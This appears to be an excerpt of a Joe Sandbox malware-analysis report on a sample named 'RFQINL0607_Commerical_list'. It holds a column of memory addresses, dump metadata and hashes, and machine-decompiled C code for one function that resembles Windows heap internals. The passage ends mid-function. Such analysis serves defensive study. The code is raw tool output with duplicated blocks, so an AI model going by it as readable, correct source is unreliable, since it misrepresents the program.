                                                                                                                                                                                  0x333b63db
                                                                                                                                                                                  0x333b6400
                                                                                                                                                                                  0x333b6400
                                                                                                                                                                                  0x333b6404
                                                                                                                                                                                  0x333b642d
                                                                                                                                                                                  0x333b6431
                                                                                                                                                                                  0x333b6442
                                                                                                                                                                                  0x333b6433
                                                                                                                                                                                  0x333b6433
                                                                                                                                                                                  0x333b6435
                                                                                                                                                                                  0x333b6438
                                                                                                                                                                                  0x333b643a
                                                                                                                                                                                  0x333b643a
                                                                                                                                                                                  0x333b643a
                                                                                                                                                                                  0x333b643d
                                                                                                                                                                                  0x333b643d
                                                                                                                                                                                  0x333b6406
                                                                                                                                                                                  0x333b640f
                                                                                                                                                                                  0x333b6415
                                                                                                                                                                                  0x333b6418
                                                                                                                                                                                  0x333b6423
                                                                                                                                                                                  0x333b6423
                                                                                                                                                                                  0x333b6425
                                                                                                                                                                                  0x333b641a
                                                                                                                                                                                  0x333b641a
                                                                                                                                                                                  0x333b641a
                                                                                                                                                                                  0x333b6427
                                                                                                                                                                                  0x333b6427
                                                                                                                                                                                  0x333b6445
                                                                                                                                                                                  0x333b644c
                                                                                                                                                                                  0x333b644f
                                                                                                                                                                                  0x333b6452
                                                                                                                                                                                  0x333b6479
                                                                                                                                                                                  0x333b6454
                                                                                                                                                                                  0x333b6454
                                                                                                                                                                                  0x333b6458
                                                                                                                                                                                  0x333b6469
                                                                                                                                                                                  0x333b645a
                                                                                                                                                                                  0x333b645a
                                                                                                                                                                                  0x333b645c
                                                                                                                                                                                  0x333b645f
                                                                                                                                                                                  0x333b6461
                                                                                                                                                                                  0x333b6461
                                                                                                                                                                                  0x333b6461
                                                                                                                                                                                  0x333b6464
                                                                                                                                                                                  0x333b6464
                                                                                                                                                                                  0x333b6474
                                                                                                                                                                                  0x333b6474
                                                                                                                                                                                  0x333b6483
                                                                                                                                                                                  0x333b6485
                                                                                                                                                                                  0x333b64b0
                                                                                                                                                                                  0x333b64b0
                                                                                                                                                                                  0x333b64ba
                                                                                                                                                                                  0x333b64bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b64c3
                                                                                                                                                                                  0x333b64c6
                                                                                                                                                                                  0x333b64c8
                                                                                                                                                                                  0x333b64da
                                                                                                                                                                                  0x333b64dc
                                                                                                                                                                                  0x333b64ef
                                                                                                                                                                                  0x333b64ef
                                                                                                                                                                                  0x333b64de
                                                                                                                                                                                  0x333b64e7
                                                                                                                                                                                  0x333b64ea
                                                                                                                                                                                  0x333b64ea
                                                                                                                                                                                  0x333b64ca
                                                                                                                                                                                  0x333b64d2
                                                                                                                                                                                  0x333b64d5
                                                                                                                                                                                  0x333b64d5
                                                                                                                                                                                  0x333b64f1
                                                                                                                                                                                  0x333b64f4
                                                                                                                                                                                  0x333b64fa
                                                                                                                                                                                  0x333b64fd
                                                                                                                                                                                  0x333b6500
                                                                                                                                                                                  0x333b6503
                                                                                                                                                                                  0x333b6506
                                                                                                                                                                                  0x333b6509
                                                                                                                                                                                  0x333b679f
                                                                                                                                                                                  0x333b679f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b650f
                                                                                                                                                                                  0x333b650f
                                                                                                                                                                                  0x333b6512
                                                                                                                                                                                  0x333b6514
                                                                                                                                                                                  0x333b6524
                                                                                                                                                                                  0x333b6524
                                                                                                                                                                                  0x333b6516
                                                                                                                                                                                  0x333b651f
                                                                                                                                                                                  0x333b651f
                                                                                                                                                                                  0x333b652d
                                                                                                                                                                                  0x333b6530
                                                                                                                                                                                  0x333b6532
                                                                                                                                                                                  0x333b6537
                                                                                                                                                                                  0x333b6539
                                                                                                                                                                                  0x333b6545
                                                                                                                                                                                  0x333b6548
                                                                                                                                                                                  0x333b654b
                                                                                                                                                                                  0x333b65dc
                                                                                                                                                                                  0x333b65df
                                                                                                                                                                                  0x333b65ed
                                                                                                                                                                                  0x333b65f0
                                                                                                                                                                                  0x333b6603
                                                                                                                                                                                  0x333b6605
                                                                                                                                                                                  0x333b660f
                                                                                                                                                                                  0x333b6611
                                                                                                                                                                                  0x333b663a
                                                                                                                                                                                  0x333b663e
                                                                                                                                                                                  0x333b664f
                                                                                                                                                                                  0x333b6640
                                                                                                                                                                                  0x333b6640
                                                                                                                                                                                  0x333b6642
                                                                                                                                                                                  0x333b6645
                                                                                                                                                                                  0x333b6647
                                                                                                                                                                                  0x333b6647
                                                                                                                                                                                  0x333b6647
                                                                                                                                                                                  0x333b664a
                                                                                                                                                                                  0x333b664a
                                                                                                                                                                                  0x333b6613
                                                                                                                                                                                  0x333b661c
                                                                                                                                                                                  0x333b6622
                                                                                                                                                                                  0x333b6625
                                                                                                                                                                                  0x333b6630
                                                                                                                                                                                  0x333b6630
                                                                                                                                                                                  0x333b6632
                                                                                                                                                                                  0x333b6627
                                                                                                                                                                                  0x333b6627
                                                                                                                                                                                  0x333b6627
                                                                                                                                                                                  0x333b6634
                                                                                                                                                                                  0x333b6634
                                                                                                                                                                                  0x333b6658
                                                                                                                                                                                  0x333b6607
                                                                                                                                                                                  0x333b660a
                                                                                                                                                                                  0x333b660a
                                                                                                                                                                                  0x333b65f2
                                                                                                                                                                                  0x333b65f8
                                                                                                                                                                                  0x333b65f8
                                                                                                                                                                                  0x333b65e1
                                                                                                                                                                                  0x333b65e9
                                                                                                                                                                                  0x333b65e9
                                                                                                                                                                                  0x333b665c
                                                                                                                                                                                  0x333b665f
                                                                                                                                                                                  0x333b6662
                                                                                                                                                                                  0x333b6664
                                                                                                                                                                                  0x333b6690
                                                                                                                                                                                  0x333b6694
                                                                                                                                                                                  0x333b66a5
                                                                                                                                                                                  0x333b6696
                                                                                                                                                                                  0x333b6696
                                                                                                                                                                                  0x333b6698
                                                                                                                                                                                  0x333b669b
                                                                                                                                                                                  0x333b669d
                                                                                                                                                                                  0x333b669d
                                                                                                                                                                                  0x333b669d
                                                                                                                                                                                  0x333b66a0
                                                                                                                                                                                  0x333b66a0
                                                                                                                                                                                  0x333b6666
                                                                                                                                                                                  0x333b666f
                                                                                                                                                                                  0x333b6675
                                                                                                                                                                                  0x333b6678
                                                                                                                                                                                  0x333b6683
                                                                                                                                                                                  0x333b6683
                                                                                                                                                                                  0x333b6685
                                                                                                                                                                                  0x333b667a
                                                                                                                                                                                  0x333b667a
                                                                                                                                                                                  0x333b667a
                                                                                                                                                                                  0x333b6687
                                                                                                                                                                                  0x333b668b
                                                                                                                                                                                  0x333b668b
                                                                                                                                                                                  0x333b66a8
                                                                                                                                                                                  0x333b66ab
                                                                                                                                                                                  0x333b66ae
                                                                                                                                                                                  0x333b66b1
                                                                                                                                                                                  0x333b66c3
                                                                                                                                                                                  0x333b66cf
                                                                                                                                                                                  0x333b66cf
                                                                                                                                                                                  0x333b66d1
                                                                                                                                                                                  0x333b66b3
                                                                                                                                                                                  0x333b66bb
                                                                                                                                                                                  0x333b66bb
                                                                                                                                                                                  0x333b6551
                                                                                                                                                                                  0x333b6554
                                                                                                                                                                                  0x333b6557
                                                                                                                                                                                  0x333b6559
                                                                                                                                                                                  0x333b655b
                                                                                                                                                                                  0x333b6563
                                                                                                                                                                                  0x333b6568
                                                                                                                                                                                  0x333b6568
                                                                                                                                                                                  0x333b656b
                                                                                                                                                                                  0x333b656f
                                                                                                                                                                                  0x333b6574
                                                                                                                                                                                  0x333b6578
                                                                                                                                                                                  0x333b6584
                                                                                                                                                                                  0x333b6589
                                                                                                                                                                                  0x333b658b
                                                                                                                                                                                  0x333b658d
                                                                                                                                                                                  0x333b6592
                                                                                                                                                                                  0x333b6592
                                                                                                                                                                                  0x333b6597
                                                                                                                                                                                  0x333b6597
                                                                                                                                                                                  0x333b659d
                                                                                                                                                                                  0x333b65a1
                                                                                                                                                                                  0x333b65a4
                                                                                                                                                                                  0x333b65a8
                                                                                                                                                                                  0x333b65ab
                                                                                                                                                                                  0x333b65b7
                                                                                                                                                                                  0x333b65bd
                                                                                                                                                                                  0x333b65bd
                                                                                                                                                                                  0x333b65bd
                                                                                                                                                                                  0x333b65c2
                                                                                                                                                                                  0x333b65c4
                                                                                                                                                                                  0x333b65c6
                                                                                                                                                                                  0x333b65cc
                                                                                                                                                                                  0x333b65d2
                                                                                                                                                                                  0x333b65d2
                                                                                                                                                                                  0x333b65c6
                                                                                                                                                                                  0x333b66d4
                                                                                                                                                                                  0x333b66d4
                                                                                                                                                                                  0x333b66d7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b653b
                                                                                                                                                                                  0x333b653b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b653b
                                                                                                                                                                                  0x333b6539
                                                                                                                                                                                  0x333b6487
                                                                                                                                                                                  0x333b6487
                                                                                                                                                                                  0x333b6487
                                                                                                                                                                                  0x333b648b
                                                                                                                                                                                  0x333b6491
                                                                                                                                                                                  0x333b6493
                                                                                                                                                                                  0x333b6498
                                                                                                                                                                                  0x333b649d
                                                                                                                                                                                  0x333b64a1
                                                                                                                                                                                  0x333b64ad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b64ad
                                                                                                                                                                                  0x333b64a3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b64a3
                                                                                                                                                                                  0x333b6485
                                                                                                                                                                                  0x333b63e2
                                                                                                                                                                                  0x333b63f5
                                                                                                                                                                                  0x333b63f7
                                                                                                                                                                                  0x333b63fa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b63fa
                                                                                                                                                                                  0x333b63c3
                                                                                                                                                                                  0x333b63c8
                                                                                                                                                                                  0x333b63cb
                                                                                                                                                                                  0x333b63ce
                                                                                                                                                                                  0x333b63d0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b63d2
                                                                                                                                                                                  0x33362846
                                                                                                                                                                                  0x3336284d
                                                                                                                                                                                  0x33362857
                                                                                                                                                                                  0x33362859
                                                                                                                                                                                  0x33362860
                                                                                                                                                                                  0x333b66df
                                                                                                                                                                                  0x333b66e1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b66e7
                                                                                                                                                                                  0x333b66ee
                                                                                                                                                                                  0x333b66f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b66f8
                                                                                                                                                                                  0x333b6704
                                                                                                                                                                                  0x333b6709
                                                                                                                                                                                  0x333b670b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6711
                                                                                                                                                                                  0x333b6713
                                                                                                                                                                                  0x333b6764
                                                                                                                                                                                  0x333b676a
                                                                                                                                                                                  0x333b676d
                                                                                                                                                                                  0x333b6771
                                                                                                                                                                                  0x333b6773
                                                                                                                                                                                  0x333b677a
                                                                                                                                                                                  0x333b678c
                                                                                                                                                                                  0x333b6791
                                                                                                                                                                                  0x333b6794
                                                                                                                                                                                  0x333b679a
                                                                                                                                                                                  0x333b679a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6771
                                                                                                                                                                                  0x333b6715
                                                                                                                                                                                  0x333b6718
                                                                                                                                                                                  0x333b671e
                                                                                                                                                                                  0x33362869
                                                                                                                                                                                  0x3336286b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33362871
                                                                                                                                                                                  0x33362871
                                                                                                                                                                                  0x33362874
                                                                                                                                                                                  0x33362878
                                                                                                                                                                                  0x333b6746
                                                                                                                                                                                  0x333b674e
                                                                                                                                                                                  0x333b6754
                                                                                                                                                                                  0x333b6757
                                                                                                                                                                                  0x333b675c
                                                                                                                                                                                  0x333b675c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33362878
                                                                                                                                                                                  0x3336286b
                                                                                                                                                                                  0x333b6729
                                                                                                                                                                                  0x333b672e
                                                                                                                                                                                  0x333b6732
                                                                                                                                                                                  0x333b6732
                                                                                                                                                                                  0x33362866
                                                                                                                                                                                  0x33362866
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33362866
                                                                                                                                                                                  0x3336281a
                                                                                                                                                                                  0x33362893
                                                                                                                                                                                  0x33362897
                                                                                                                                                                                  0x3336289a
                                                                                                                                                                                  0x333628a3
                                                                                                                                                                                  0x333628a3
                                                                                                                                                                                  0x333628a3
                                                                                                                                                                                  0x333628a5
                                                                                                                                                                                  0x333628a9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333628ab
                                                                                                                                                                                  0x333628ab
                                                                                                                                                                                  0x333628ad
                                                                                                                                                                                  0x333628af
                                                                                                                                                                                  0x333628b1
                                                                                                                                                                                  0x333628b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333628b2
                                                                                                                                                                                  0x3336281c
                                                                                                                                                                                  0x3336281c
                                                                                                                                                                                  0x3336281e
                                                                                                                                                                                  0x33362820
                                                                                                                                                                                  0x33362822
                                                                                                                                                                                  0x33362823
                                                                                                                                                                                  0x33362828
                                                                                                                                                                                  0x33362828
                                                                                                                                                                                  0x3336282a
                                                                                                                                                                                  0x3336282f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336282f
                                                                                                                                                                                  0x3336281a
                                                                                                                                                                                  0x333627f0
                                                                                                                                                                                  0x333627f6
                                                                                                                                                                                  0x333627fa
                                                                                                                                                                                  0x333b6370
                                                                                                                                                                                  0x333b6370
                                                                                                                                                                                  0x333b6373
                                                                                                                                                                                  0x333b6375
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b637b
                                                                                                                                                                                  0x333b6381
                                                                                                                                                                                  0x333b6383
                                                                                                                                                                                  0x333b638e
                                                                                                                                                                                  0x333b6390
                                                                                                                                                                                  0x333b6395
                                                                                                                                                                                  0x333b6395
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6383
                                                                                                                                                                                  0x33362800
                                                                                                                                                                                  0x33362807
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33362807

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f2287e8646081ea12b04d4a0117923b509077ffa318a2baae281fa0f9d9f4477
                                                                                                                                                                                  • Instruction ID: cb6762a1644719163e75bc60775922d1cdb37a8f15f78532b94f26a92e1f7816
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2287e8646081ea12b04d4a0117923b509077ffa318a2baae281fa0f9d9f4477
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E32F174E447548FEF14CF69C8907AEBBF6AF84704F24C12DD4899BA86DB39A841CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3341124C Relevance: .6, Instructions: 571COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                  			E3341124C(signed int* __ecx, char __edx) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int* _t202;
				signed int _t204;
				signed int _t206;
				signed int* _t207;
				signed int _t216;
				char* _t218;
				signed int _t219;
				void* _t222;
				signed int** _t228;
				signed int _t233;
				signed int _t241;
				void* _t242;
				signed int** _t248;
				signed int _t255;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				signed int _t278;
				void* _t281;
				unsigned int* _t283;
				intOrPtr _t291;
				signed int _t292;
				char* _t312;
				signed int* _t317;
				signed int _t318;
				intOrPtr* _t319;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t331;
				void* _t348;
				void* _t356;
				signed int _t360;
				signed int _t376;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed char _t407;
				signed int _t408;
				signed int* _t409;
				signed char _t411;
				signed int* _t412;
				signed int _t416;
				signed char _t418;
				signed int* _t421;
				signed int* _t430;
				signed int _t444;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int* _t451;
				intOrPtr* _t452;
				signed int* _t453;
				signed int _t454;
				signed int _t455;
				signed char* _t459;
				void* _t460;
				void* _t462;
				signed int* _t463;
				void* _t484;

				_t317 = __ecx;
				_v40 = __edx;
				_v8 = __ecx;
				while(1) {
					L1:
					_t3 =  &(_t317[1]); // 0x33444804
					_t202 = _t3;
					goto L2;
					do {
						while(1) {
							L2:
							_t404 =  *_t202;
							_v12 = _t404;
							if(_t404 == 0) {
								goto L31;
							} else {
								_v24 = _v24 & 0x00000000;
								_t283 = _t404 + 0x10;
								_v20 = _t283;
								_t336 =  *_t317;
								_t454 =  *( *_t317 + 0xc);
								_v32 = _t454;
								if( *_t283 >> 0x10 < 0) {
									_t11 =  &(_t317[0x17]); // 0x0
									_t448 =  *_t11 & 0x0000ffff;
									_t336 = 1;
									_v24 = 1;
									if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
										_t336 = _t454;
										if(E3334E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
											_t336 = 1;
											 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
											if(L33363C40() == 0) {
												_t312 = 0x7ffe0380;
											} else {
												_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											}
											if( *_t312 != 0) {
												_t336 = 1;
												if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
													_t336 =  *(_t454 + 0xc);
													E3340EE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
												}
											}
										}
										_t404 = _v12;
									}
								}
								asm("sbb eax, eax");
								_t445 = 0;
								_v28 = 0;
							}
							do {
								L14:
								_t455 =  *(_t404 + 0x10);
								if((_t455 >> 0x00000010 & 0x00008000) != 0) {
									goto L17;
								}
								if(_t455 == 0) {
									L26:
									_t406 = 0;
									L27:
									if(_v24 != 0) {
										_t291 =  *0x33444364; // 0x0
										_t484 = _t291 + 1 -  *0x33444360; // 0x10
										if(_t484 < 0) {
											asm("lock cmpxchg [esi], ecx");
										}
									}
									if(_t406 != 0) {
										L131:
										return _t406;
									} else {
										goto L31;
									}
								}
								_t336 = _t455 | 0x80000000;
								asm("lock cmpxchg [ebx], ecx");
								_t317 = _v8;
								if(_t455 == _t455) {
									L19:
									if(_t455 == 0xffffffff) {
										goto L26;
									}
									_t292 =  *((intOrPtr*)(_t404 + 4));
									_v16 = _t292;
									if(_t292 == 0 ||  *_t404 != _t317 || _t455 == 0) {
										 *_v20 = _t455;
										goto L26;
									} else {
										_t45 =  &(_t317[0x17]); // 0x0
										_t46 = ( *_t45 & 0x0000ffff) + 0x3332bf30; // 0x20202020
										_t447 = E333A7A51(_v16 + 0x14,  *((E333A7AF9(_t336) & 0x0000ffff) + 0x33444200) & 0x000000ff,  *_t46 & 0x000000ff);
										_t457 = _v16;
										 *_v20 = (_t455 & 0x0000ffff) - 0x00000001 | _t447 << 0x00000010;
										_t406 = (( *(_v16 + 0x10) ^  *0x33446964 ^ _v16 ^ _v32) & 0x0000ffff) + (( *(_v16 + 0x10) ^  *0x33446964 ^ _v16 ^ _v32) >> 0x10) * _t447 + _t457;
										if(( *(_t406 + 7) & 0x0000003f) != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(_t406);
											_t348 = 0xf;
											E33415FED(_t348,  *((intOrPtr*)( *( *_t317 + 0xc) + 0xc)));
											_t406 = 0;
										}
										goto L27;
									}
								}
								L17:
								_t445 = _t445 + 1;
							} while (_t445 <= _v28);
							_t455 = _t455 | 0xffffffff;
							goto L19;
							L31:
							_v28 =  *_t317;
							_t64 =  &(_t317[2]); // 0x33444808
							_t204 = _t64;
							_v16 = _t204;
							while(1) {
								_t444 = 0;
								while(1) {
									L33:
									_t318 = 0;
									_v20 = 0x10;
									_v24 = _v24 & 0;
									_t331 = _t204;
									_v12 = _t331;
									do {
										L34:
										_t405 =  *_t331;
										_t451 = _v8;
										_v32 = _t405;
										if(_t405 != 0) {
											_t206 =  *(_t405 + 0x10) & 0x0000ffff;
											_v36 = _t206;
											if(_t206 > _v24) {
												_t281 = E3338BF0C(_t451, _t405);
												_t331 = _v12;
												if(_t281 == 0) {
													_t318 = _t331;
													_t444 = _v32;
													_v24 = _v36;
												}
											}
										}
										_t331 = _t331 + 4;
										_t79 =  &_v20;
										 *_t79 = _v20 - 1;
										_v12 = _t331;
									} while ( *_t79 != 0);
									_v24 = _t444;
									if(_t318 == 0) {
										_t444 = 0;
										L55:
										if(_t444 == 0) {
											_t207 = _v8;
											_t452 = 0;
											_t111 = _t207 + 0x5c; // 0x0
											_t211 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x3c0 + ( *_t111 & 0x0000ffff) * 4)) + 0x48;
											_v16 = 0;
											_v24 = 0;
											_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x3c0 + ( *_t111 & 0x0000ffff) * 4)) + 0x48;
											while(1) {
												_t319 = E3337FE50(_t211);
												_v28 = _t319;
												if(_t319 == 0) {
													break;
												}
												_t121 = _t319 - 0x20; // -32
												_t444 = _t121;
												_t122 = _t444 + 0x1c; // -4
												_t421 = _t122;
												if((1 &  *_t421) == 0) {
													_t323 = 0xfffffffd;
													_t255 =  *_t421;
													do {
														asm("lock cmpxchg [edx], ecx");
													} while ((_t255 & _t323) != 0);
													_t324 = _v28;
													if(_t255 != 2) {
														L87:
														_t211 = _v20;
														_t444 = 0;
														continue;
													}
													L86:
													 *_t444 =  *_t444 & 0x00000000;
													E333620E0( *( *_t444), _t324);
													goto L87;
												}
												if(E33392670(_t444, _v8) == 0) {
													_t259 = _v16;
													if(_t259 == 0) {
														_v24 = _t319;
													}
													 *_t319 = _t452;
													_t452 = _t319;
													_v16 = _t259 + 1;
													goto L87;
												}
												_t126 = _t444 + 0x1c; // -4
												_t325 = 0xfffffffd;
												_t261 =  *_t126;
												do {
													asm("lock cmpxchg [edx], ecx");
												} while ((_t261 & _t325) != 0);
												_t324 = _v28;
												if(_t261 == 2) {
													goto L86;
												}
												if(E33363AF6(_v8, _t444) == 0) {
													goto L87;
												}
												break;
											}
											_t335 = _v16;
											if(_v16 != 0) {
												E333DE9B0(_v20, _t452, _v24, _t335);
											}
											L70:
											if(_t444 == 0) {
												_t406 = 0;
												goto L131;
											}
											_t133 = _t444 + 0x1c; // 0x1c
											_t453 = _t133;
											 *((char*)(_t444 + 0x1b)) = _v40;
											while(1) {
												_t317 = _v8;
												_t407 =  *_t453;
												_t136 =  &(_t317[1]); // 0x33444804
												_t202 = _t136;
												if(_t407 == 0) {
													break;
												}
												_t137 =  &(_t317[1]); // 0x33444804
												_t202 = _t137;
												if((_t407 & 0x00000006) != 0) {
													while(1) {
														L2:
														_t404 =  *_t202;
														_v12 = _t404;
														if(_t404 == 0) {
															goto L31;
														} else {
															_v24 = _v24 & 0x00000000;
															_t283 = _t404 + 0x10;
															_v20 = _t283;
															_t336 =  *_t317;
															_t454 =  *( *_t317 + 0xc);
															_v32 = _t454;
															if( *_t283 >> 0x10 < 0) {
																_t11 =  &(_t317[0x17]); // 0x0
																_t448 =  *_t11 & 0x0000ffff;
																_t336 = 1;
																_v24 = 1;
																if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																	_t336 = _t454;
																	if(E3334E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																		_t336 = 1;
																		 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																		if(L33363C40() == 0) {
																			_t312 = 0x7ffe0380;
																		} else {
																			_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																		}
																		if( *_t312 != 0) {
																			_t336 = 1;
																			if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																				_t336 =  *(_t454 + 0xc);
																				E3340EE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																			}
																		}
																	}
																	_t404 = _v12;
																}
															}
															asm("sbb eax, eax");
															_t445 = 0;
															_v28 = 0;
														}
														goto L14;
													}
												}
												asm("lock cmpxchg [esi], ecx");
												if(_t407 != _t407) {
													continue;
												}
												_t216 =  *_t444;
												_v36 = _t216;
												if(_t216 == _t317) {
													L105:
													if(L33363C40() == 0) {
														_t218 = 0x7ffe0380;
													} else {
														_t218 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
													}
													if( *_t218 != 0 && ( *( *[fs:0x30] + 0x240) & 1) != 0) {
														E3340F409( *((intOrPtr*)( *( *_t317 + 0xc) + 0xc)),  *((intOrPtr*)(_t444 + 4)));
													}
													_t174 =  &(_t317[1]); // 0x33444804
													_t202 = _t174;
													_t175 = _t444;
													_t444 =  *_t202;
													 *_t202 = _t175;
													if(_t444 == 0) {
														break;
														do {
															do {
																do {
																	while(1) {
																		L2:
																		_t404 =  *_t202;
																		_v12 = _t404;
																		if(_t404 == 0) {
																			goto L31;
																		} else {
																			_v24 = _v24 & 0x00000000;
																			_t283 = _t404 + 0x10;
																			_v20 = _t283;
																			_t336 =  *_t317;
																			_t454 =  *( *_t317 + 0xc);
																			_v32 = _t454;
																			if( *_t283 >> 0x10 < 0) {
																				_t11 =  &(_t317[0x17]); // 0x0
																				_t448 =  *_t11 & 0x0000ffff;
																				_t336 = 1;
																				_v24 = 1;
																				if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																					_t336 = _t454;
																					if(E3334E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																						_t336 = 1;
																						 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																						if(L33363C40() == 0) {
																							_t312 = 0x7ffe0380;
																						} else {
																							_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																						}
																						if( *_t312 != 0) {
																							_t336 = 1;
																							if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																								_t336 =  *(_t454 + 0xc);
																								E3340EE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																							}
																						}
																					}
																					_t404 = _v12;
																				}
																			}
																			asm("sbb eax, eax");
																			_t445 = 0;
																			_v28 = 0;
																		}
																		goto L14;
																	}
																	goto L105;
																} while (_t444 == 0);
																goto L112;
																L88:
																_t242 = E33363AF6(_v36, _t444);
																_t147 =  &(_t317[1]); // 0x33444804
																_t202 = _t147;
															} while (_t242 == 0);
															while(1) {
																_t418 =  *_t453;
																_t148 =  &(_t317[1]); // 0x33444804
																_t202 = _t148;
																if(_t418 == 0) {
																	goto L2;
																}
																_t149 =  &(_t317[1]); // 0x33444804
																_t202 = _t149;
																if((_t418 & 0x00000002) != 0) {
																	while(1) {
																		L2:
																		_t404 =  *_t202;
																		_v12 = _t404;
																		if(_t404 == 0) {
																			goto L31;
																		} else {
																			_v24 = _v24 & 0x00000000;
																			_t283 = _t404 + 0x10;
																			_v20 = _t283;
																			_t336 =  *_t317;
																			_t454 =  *( *_t317 + 0xc);
																			_v32 = _t454;
																			if( *_t283 >> 0x10 < 0) {
																				_t11 =  &(_t317[0x17]); // 0x0
																				_t448 =  *_t11 & 0x0000ffff;
																				_t336 = 1;
																				_v24 = 1;
																				if((1 &  *(_t454 + 0x1bf + _t448 * 4)) == 0) {
																					_t336 = _t454;
																					if(E3334E202(_t454,  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff) >= 0) {
																						_t336 = 1;
																						 *(_t454 + 0x1bf + _t448 * 4) =  *(_t454 + 0x1bf + _t448 * 4) | 1;
																						if(L33363C40() == 0) {
																							_t312 = 0x7ffe0380;
																						} else {
																							_t312 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
																						}
																						if( *_t312 != 0) {
																							_t336 = 1;
																							if(( *( *[fs:0x30] + 0x240) & 1) != 0) {
																								_t336 =  *(_t454 + 0xc);
																								E3340EE78( *(_t454 + 0xc),  *(_t454 + 0x1be + _t448 * 4) & 0x000000ff);
																							}
																						}
																					}
																					_t404 = _v12;
																				}
																			}
																			asm("sbb eax, eax");
																			_t445 = 0;
																			_v28 = 0;
																		}
																		goto L14;
																	}
																}
																asm("lock cmpxchg [esi], ecx");
																if(_t418 != _t418) {
																	continue;
																}
																_t376 =  *_t444;
																_t462 = 0;
																_v24 = _t376;
																do {
																	_t248 = _t376 + ((( *(_t376 + 0x5e) & 0x0000ffff) + _t462 & 0x0000000f) + 2) * 4;
																	_t412 =  *_t248;
																	_v28 = _t248;
																	if(_t412 != 0) {
																		if((_t412[7] & 0x00000001) != 0) {
																			goto L99;
																		}
																		asm("lock cmpxchg [ebx], ecx");
																		_t317 = _v8;
